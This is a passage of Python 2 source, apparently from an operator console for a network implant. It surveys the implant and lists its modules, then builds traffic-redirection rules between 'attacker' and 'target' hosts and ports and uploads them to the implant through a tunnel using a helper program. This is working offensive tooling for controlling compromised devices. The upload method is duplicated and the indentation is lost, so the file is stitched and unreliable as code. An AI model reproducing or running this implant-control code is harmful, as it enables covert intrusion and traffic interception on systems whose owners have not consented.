self.logger.info(output[os_version].rstrip('\r\n'))
except:
self.logger.exception('could not determine the OS')
try:
self.logger.info(output[implant_version].rstrip('\r\n'))
except:
self.logger.exception('could not determine the implant version')
try:
if uptime != 0:
self.logger.info(output[uptime].rstrip('\r\n'))
except:
self.logger.exception('could not determine the uptime')
try:
if mod_start != 0:
module_info = output[mod_start:mod_end]
end = False
for i in module_info[:-1]:
for j in i.split(' '):
if j in self.sfile['mod_num_dict']:
uploaded_modlist_tmp.append(j)
if 'BG#' in i:
end = True
if end == False:
self.logger.info(i.rstrip('\r\n'))
else:
self.logger.info('No modules are currently uploaded')
except:
self.logger.exception('could not get the module information')
try:
interface_info = output[int_start:int_end + 1]
interface_info_out = []
for i in interface_info:
self.logger.info(i.rstrip('\r\n'))
except:
self.logger.exception('could not get the interface information')
try:
#store in dictomary the modules with the number
mod_num_dict = {}
self.logger.info('List of modules that can be uploaded')
for i in module_list:
format = i.rstrip('\r\n')[1:]
mod_array = filter(None, format.split(' '))
if len(mod_array) == 3:
self.logger.info(mod_array[1])
number = mod_array[0]
mod_num_dict[mod_array[1]] = number[:-1]
self.logger.debug(mod_num_dict)
self.sfile['mod_num_dict'] = mod_num_dict
#set up dicts to store handle information
for i in mod_num_dict:
if self.sfile.has_key(i) == False:
self.sfile[i] = {}
except:
self.logger.exception('could not build module dictonary')
#get uploaded modules
self.sfile['uploaded_mod_list'] = uploaded_modlist_tmp
plogfile.close()
#set survey to true
self.sfile['survey'] = True
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
def do_upload_rules(self, line):
'''upload_rules
will upload your currently configured rule'''
self.logger.debug('uploading rules')
try:
handles = self.sfile['packetToolkit']
add_handle = handles['PD_addRuleHandler']
except:
self.logger.exception(
'could to get handle information for addRuleHandler')
return
if tools.checkTunnelRule(self.sfile, self.logger) == False:
return
#update ports
self.logger.debug('upload rule checks passed, building rules')
#Create rule file
string_rule1 = '1 ' + str(
self.sfile['current_rule']['attk_int']
) + ' 0 2 ' + str(self.sfile['current_rule']['tgt_dest']) + ' ' + str(
self.sfile['current_rule']['tgt_dport']) + ' ' + str(
self.sfile['current_rule']['tgt_source']) + ' ' + str(
self.sfile['current_rule']['tgt_sport']) + ' ' + str(
self.sfile['current_rule']
['tgt_int']) + ' 0 0 src host ' + str(
self.sfile['current_rule']
['attk_source']) + ' and dst host ' + str(
self.sfile['current_rule']['attk_dest'])
if self.sfile['current_rule']['attk_sport'] != '0':
string_rule1 += ' and src port ' + str(
self.sfile['current_rule']['attk_sport'])
if self.sfile['current_rule']['attk_dport'] != '0':
string_rule1 += ' and dst port ' + str(
self.sfile['current_rule']['attk_dport'])
string_rule1 += ' and (icmp or udp or tcp)'
if self.sfile['mode'] == 'simple':
string_rule2 = '2 ' + str(
self.sfile['current_rule']['tgt_int']) + ' 0 2 ' + str(
self.sfile['current_rule']['attk_source']) + ' ' + str(
self.sfile['current_rule']['attk_sport']) + ' ' + str(
self.sfile['current_rule']
['attk_dest']) + ' ' + str(
self.sfile['current_rule']
['attk_dport']) + ' ' + str(
self.sfile['current_rule']['attk_int']
) + ' 0 0 src host ' + str(
self.sfile['current_rule']['tgt_dest']
) + ' and dst host ' + str(
self.sfile['current_rule']['tgt_source'])
if self.sfile['current_rule']['tgt_dport'] != '0':
string_rule2 += ' and src port ' + str(
self.sfile['current_rule']['tgt_dport'])
if self.sfile['current_rule']['tgt_sport'] != '0':
string_rule2 += ' and dst port ' + str(
self.sfile['current_rule']['tgt_sport'])
string_rule2 += ' and (icmp or udp or tcp)'
temp_counter = 0
found_file = False
while found_file == False:
if os.path.isfile(
os.path.join(self.sfile['logs_to_process'],
'tunnel' + str(temp_counter))) == True:
temp_counter += 1
else:
tunnel_log_file = os.path.join(self.sfile['logs_to_process'],
'tunnel' + str(temp_counter))
found_file = True
tunnel_file = file(tunnel_log_file, 'a')
tunnel_file.write(string_rule1)
tunnel_file.write('\r\n')
tunnel_file.write(string_rule2)
tunnel_file.write('\r\n')
tunnel_file.close()
self.logger.debug('Rule: ' + str(string_rule1))
self.logger.debug('Rule: ' + str(string_rule2))
#open tunnel
tunnel_number = tools.openTunnel(self.sfile, self.logger)
#build command and run it
command = str(self.sfile['miniprog']) + ' --arg "' + str(
os.path.join(self.sfile['logs_to_process'], tunnel_log_file)
) + '" --name add_rule --cmd ' + str(
add_handle) + ' --bsize 512 --idkey ' + str(
self.sfile['idkey']) + ' --sport ' + str(
self.sfile['sport']) + ' --dport ' + str(
self.sfile['dport']) + ' --lp ' + str(
self.sfile['lp']) + ' --implant ' + str(
self.sfile['implant']) + ' --logdir ' + str(
self.sfile['logs_to_process'])
add_rule = subprocess.Popen(shlex.split(command),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output_stdout = add_rule.stdout.read()
output_stderr = add_rule.stderr.read()
self.logger.debug('Add rule command: ' + str(command))
self.logger.debug('Add rule stdout: ' + str(output_stdout))
self.logger.debug('Add rule stderr: ' + str(output_stderr))
#looks like \r\m is not workint maybe use re instead
for i in output_stderr.split('\n'):
if 'Rule added' in i:
self.logger.info(i)
temp = self.sfile['rules']
temp.append(i.split(': ')[-1])
self.sfile['rules'] = temp
#close tunnel
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
def do_upload_rules(self,line):
'''upload_rules
will upload your currently configured rule'''
self.logger.debug('uploading rules')
try:
handles = self.sfile['packetToolkit']
add_handle = handles['PD_addRuleHandler']
except:
self.logger.exception('could to get handle information for addRuleHandler')
return
if tools.checkTunnelRule(self.sfile, self.logger) == False:
return
#update ports
self.logger.debug('upload rule checks passed, building rules')
#Create rule file
string_rule1 = '1 ' + str(self.sfile['current_rule']['attk_int']) + ' 0 2 ' + str(self.sfile['current_rule']['tgt_dest']) + ' ' + str(self.sfile['current_rule']['tgt_dport']) + ' ' + str(self.sfile['current_rule']['tgt_source']) + ' ' + str(self.sfile['current_rule']['tgt_sport']) + ' ' + str(self.sfile['current_rule']['tgt_int']) + ' 0 0 src host ' + str(self.sfile['current_rule']['attk_source']) + ' and dst host ' + str(self.sfile['current_rule']['attk_dest'])
if self.sfile['current_rule']['attk_sport'] != '0':
string_rule1 += ' and src port ' + str(self.sfile['current_rule']['attk_sport'])
if self.sfile['current_rule']['attk_dport'] != '0':
string_rule1 += ' and dst port ' + str(self.sfile['current_rule']['attk_dport'])
string_rule1 += ' and (icmp or udp or tcp)'
if self.sfile['mode'] == 'simple':
string_rule2 = '2 ' + str(self.sfile['current_rule']['tgt_int']) + ' 0 2 ' + str(self.sfile['current_rule']['attk_source']) + ' ' + str(self.sfile['current_rule']['attk_sport']) + ' ' + str(self.sfile['current_rule']['attk_dest']) + ' ' + str(self.sfile['current_rule']['attk_dport']) + ' ' + str(self.sfile['current_rule']['attk_int']) + ' 0 0 src host ' + str(self.sfile['current_rule']['tgt_dest']) + ' and dst host ' + str(self.sfile['current_rule']['tgt_source'])
if self.sfile['current_rule']['tgt_dport'] != '0':
string_rule2 += ' and src port ' + str(self.sfile['current_rule']['tgt_dport'])
if self.sfile['current_rule']['tgt_sport'] != '0':
string_rule2 += ' and dst port ' + str(self.sfile['current_rule']['tgt_sport'])
string_rule2 += ' and (icmp or udp or tcp)'
temp_counter = 0
found_file = False
while found_file == False:
if os.path.isfile(os.path.join(self.sfile['logs_to_process'],'tunnel' +str(temp_counter))) == True:
temp_counter += 1
else:
tunnel_log_file = os.path.join(self.sfile['logs_to_process'],'tunnel' +str(temp_counter))
found_file = True
tunnel_file = file(tunnel_log_file,'a')
tunnel_file.write(string_rule1)
tunnel_file.write('\r\n')
tunnel_file.write(string_rule2)
tunnel_file.write('\r\n')
tunnel_file.close()
self.logger.debug('Rule: ' + str(string_rule1))
self.logger.debug('Rule: ' + str(string_rule2))
#open tunnel
tunnel_number = tools.openTunnel(self.sfile, self.logger)
#build command and run it
command = str(self.sfile['miniprog']) + ' --arg "' + str(os.path.join(self.sfile['logs_to_process'],tunnel_log_file)) + '" --name add_rule --cmd ' + str(add_handle) + ' --bsize 512 --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --logdir ' + str(self.sfile['logs_to_process'])
add_rule = subprocess.Popen(shlex.split(command),stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output_stdout = add_rule.stdout.read()
output_stderr = add_rule.stderr.read()
self.logger.debug('Add rule command: ' + str(command))
self.logger.debug('Add rule stdout: ' + str(output_stdout))
self.logger.debug('Add rule stderr: ' + str(output_stderr))
#looks like \r\m is not workint maybe use re instead
for i in output_stderr.split('\n'):
if 'Rule added' in i:
self.logger.info(i)
temp = self.sfile['rules']
temp.append(i.split(': ')[-1])
self.sfile['rules'] = temp
#close tunnel
tools.closeTunnel(self.sfile,tunnel_number,self.logger)